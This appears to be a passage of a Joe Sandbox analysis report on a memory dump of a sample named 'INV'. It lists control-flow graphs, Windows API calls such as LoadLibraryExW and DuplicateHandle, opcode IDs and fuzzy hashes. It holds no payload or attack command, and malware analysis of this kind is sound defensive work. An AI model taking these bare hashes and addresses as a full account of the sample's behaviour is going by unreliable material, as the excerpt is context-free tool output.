                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FAFE4A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: CreateWindow
                                  • String ID:
                                  • API String ID: 716092398-0
                                  • Opcode ID: 20d4e530020a2b5b3eeac578a5806e9530e1b0212121c4ba81a8c09b8ae2f04f
                                  • Instruction ID: 84010d76f8c353c10c313b8687eb3beeeaa84519b657281b0f17af670eb06006
                                  • Opcode Fuzzy Hash: 20d4e530020a2b5b3eeac578a5806e9530e1b0212121c4ba81a8c09b8ae2f04f
                                  • Instruction Fuzzy Hash: 9941B0B1D10309AFDB14CFAAD884ADEBFB5BF48314F24812AE819AB251D7749945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 66 fa5365-fa5431 CreateActCtxA 68 fa543a-fa5494 66->68 69 fa5433-fa5439 66->69 76 fa54a3-fa54a7 68->76 77 fa5496-fa5499 68->77 69->68 78 fa54b8 76->78 79 fa54a9-fa54b5 76->79 77->76 81 fa54b9 78->81 79->78 81->81
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00FA5421
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: fed1fc78c2057e0858c87bdbe11c45bfb5b390d40e58da28c050c8e1b30b9581
                                  • Instruction ID: f35b2be1b3b675987bd92dd37c1a3c6cbfef74d41bd99ef544dea8434ccc3ac6
                                  • Opcode Fuzzy Hash: fed1fc78c2057e0858c87bdbe11c45bfb5b390d40e58da28c050c8e1b30b9581
                                  • Instruction Fuzzy Hash: 5D4115B1C00618CFDB24CFA9D885BDDBBB1FF89319F208069D408AB251DBB56946CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 82 fa3de4-fa5431 CreateActCtxA 85 fa543a-fa5494 82->85 86 fa5433-fa5439 82->86 93 fa54a3-fa54a7 85->93 94 fa5496-fa5499 85->94 86->85 95 fa54b8 93->95 96 fa54a9-fa54b5 93->96 94->93 98 fa54b9 95->98 96->95 98->98
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00FA5421
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 076dcb29a68114def62dcde27b1e598b439c9e29f60898cd9a1552bf2bf65ce0
                                  • Instruction ID: be910e0059a7d801bb084569d7148f2954472917d0e5b6d0a0ab924581d225a2
                                  • Opcode Fuzzy Hash: 076dcb29a68114def62dcde27b1e598b439c9e29f60898cd9a1552bf2bf65ce0
                                  • Instruction Fuzzy Hash: 9E41F3B1C00718CBDB24DFA9D84478EBBB5BF49315F208059D408AB251DBB56945CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 99 fa9b32-fa9b35 100 fa9ad0-fa9b10 99->100 101 fa9b37-fa9b78 99->101 109 fa9b12 100->109 110 fa9b17-fa9b1e 100->110 102 fa9b7a-fa9b7d 101->102 103 fa9b80-fa9baf LoadLibraryExW 101->103 102->103 105 fa9bb8-fa9bd5 103->105 106 fa9bb1-fa9bb7 103->106 106->105 109->110
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FA9991,00000800,00000000,00000000), ref: 00FA9BA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: f441441485fe35046e2443b883ed3a11a79377197cc006668bbc0be0318d883f
                                  • Instruction ID: f646e836680447ec6ee941920830da342c59c15daf08885757930ac5eaf3511a
                                  • Opcode Fuzzy Hash: f441441485fe35046e2443b883ed3a11a79377197cc006668bbc0be0318d883f
                                  • Instruction Fuzzy Hash: 562146B6C042489FCB20CFAAE444ADEFBB4FF89364F14846AD455A7600C3B46906CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 112 fab8f2-fab8f4 113 fab8e9-fab8ef 112->113 114 fab8f5-fab98c DuplicateHandle 112->114 113->112 115 fab98e-fab994 114->115 116 fab995-fab9b2 114->116 115->116
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAB97F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 137f9ebcabbd4eed9c1c385472478a7105d95abcd2fbbe59f825127231c8bc41
                                  • Instruction ID: 730ffdb55bdc85acc0e411afecdb848487667d30bd56183750b432be2eb4d676
                                  • Opcode Fuzzy Hash: 137f9ebcabbd4eed9c1c385472478a7105d95abcd2fbbe59f825127231c8bc41
                                  • Instruction Fuzzy Hash: F22124B59043489FDB10CFA9D884ADEBFF4EB49320F18805AE954A7212C378A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 119 fa9841-fa9842 120 fa9848-fa9851 119->120 121 fa9853-fa9878 120->121 122 fa98a6-fa98ad 120->122 122->120 124 fa98af-fa98f0 122->124 125 fa98f8-fa9923 GetModuleHandleW 124->125 126 fa98f2-fa98f5 124->126 127 fa992c-fa9940 125->127 128 fa9925-fa992b 125->128 126->125 128->127
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00FA9916
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 1f6a981bf39fdbaf946bb65463be35e37ec022403d7d1e064b302c50cb27ec9e
                                  • Instruction ID: 33f422b89c0d7effa233c8d5e4fc51905ca48a81d2bd1aa165e224f5c5477f4e
                                  • Opcode Fuzzy Hash: 1f6a981bf39fdbaf946bb65463be35e37ec022403d7d1e064b302c50cb27ec9e
                                  • Instruction Fuzzy Hash: 24218BB2C083858FDB11CFAAC4446DEBFB4EF4A320F54859AC495AB212C3785506CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 130 fab8f8-fab98c DuplicateHandle 131 fab98e-fab994 130->131 132 fab995-fab9b2 130->132 131->132
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAB97F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: baa01261cd9fb640e7388eb00a8df006bfa9be27676dec219af3c1ff54b2e28d
                                  • Instruction ID: 55ebc2457655860322da9e9478d714a2b52f9b22b3b6c9314227cca4260430b4
                                  • Opcode Fuzzy Hash: baa01261cd9fb640e7388eb00a8df006bfa9be27676dec219af3c1ff54b2e28d
                                  • Instruction Fuzzy Hash: 3C21E4B5D00219AFDB10CF9AD484ADEBFF8FB48324F14841AE954A3310D374A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 135 fa94b8-fa9b78 137 fa9b7a-fa9b7d 135->137 138 fa9b80-fa9baf LoadLibraryExW 135->138 137->138 139 fa9bb8-fa9bd5 138->139 140 fa9bb1-fa9bb7 138->140 140->139
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00FA9991,00000800,00000000,00000000), ref: 00FA9BA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 9685a5e27847ded551a2d4dd4ce959d44d3c7f210e36f4d512d8b7dc0620553b
                                  • Instruction ID: c114b69674f84ad6fe9cfb09309c7861cfa68d1241a7ecfc6a00121ce6ca3ed5
                                  • Opcode Fuzzy Hash: 9685a5e27847ded551a2d4dd4ce959d44d3c7f210e36f4d512d8b7dc0620553b
                                  • Instruction Fuzzy Hash: E31100B6D042099FDB10CF9AD444BDEBBF4AB98364F14842AE915A7600C7B4AA45CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 143 fa98b0-fa98f0 144 fa98f8-fa9923 GetModuleHandleW 143->144 145 fa98f2-fa98f5 143->145 146 fa992c-fa9940 144->146 147 fa9925-fa992b 144->147 145->144 147->146
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00FA9916
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: eb1395d9c965e80eccb7bcc5a88d57d166b5903595e799c1629f3a8f8d9bd540
                                  • Instruction ID: 50cd4e9a00e3fc7fd65f1dcb4a7afb23811600e7b137d09b6b28ffaaac5e4f43
                                  • Opcode Fuzzy Hash: eb1395d9c965e80eccb7bcc5a88d57d166b5903595e799c1629f3a8f8d9bd540
                                  • Instruction Fuzzy Hash: 77110FB6C002499FDB10CF9AC444BDEFBF4EB89324F14842AD869B7200C3B8A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b23859394138787157d48c6cb6f10563a661d8b0b17df234fb488ce1f48dcb67
                                  • Instruction ID: 881242641e1179ce70c22e7340dd584237847dd6fc71f1c907a1ed5d195a8a1d
                                  • Opcode Fuzzy Hash: b23859394138787157d48c6cb6f10563a661d8b0b17df234fb488ce1f48dcb67
                                  • Instruction Fuzzy Hash: F31283F24917468AE330CF65EC981893BB1B7C6328F944209D2E56FAD9D7BE114ACF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 533d0b3c6ca49145cee60d102589a38a0d3c6e0a9b1242751fc653e2e5fcd4e6
                                  • Instruction ID: 5ded6e7bed005cd568a5bfb23330e370040345eb247ce66bd2fde01ba3c26825
                                  • Opcode Fuzzy Hash: 533d0b3c6ca49145cee60d102589a38a0d3c6e0a9b1242751fc653e2e5fcd4e6
                                  • Instruction Fuzzy Hash: 69A17172E002198FCF15DFB5C8446DEBBF2FF85310B15856AE806BB261DB39A945DB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.257147359.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fa0000_INV.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d1dfb27fa3d99fb47d1084b67b581b91d68e8da3663bd6c7794e0bf81d6a2fa
                                  • Instruction ID: 0d145e3a583fe19f664218228cb500704e9872018cc8f5e42164f5a41a70185c
                                  • Opcode Fuzzy Hash: 6d1dfb27fa3d99fb47d1084b67b581b91d68e8da3663bd6c7794e0bf81d6a2fa
                                  • Instruction Fuzzy Hash: 9EC108B28517468BD720DF65EC981897BB1FBC7328F904209D2A16F6D8D7BE104ACF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%